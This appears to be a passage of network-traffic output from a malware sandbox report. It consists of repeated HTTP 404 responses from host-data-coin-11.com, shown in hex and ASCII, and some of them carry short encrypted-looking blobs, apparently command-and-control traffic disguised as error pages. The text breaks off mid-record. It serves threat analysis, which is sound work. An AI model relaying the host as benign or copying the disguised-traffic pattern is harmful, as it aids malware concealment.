Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 31 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS1SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 96 d3 08 55 3b 43 be f4 d4 fc fc 43 eb 1e d1 6d bc 19 74 b6 50 a1 b9 70 b8 7b 07 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OU;CCmtPp{P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 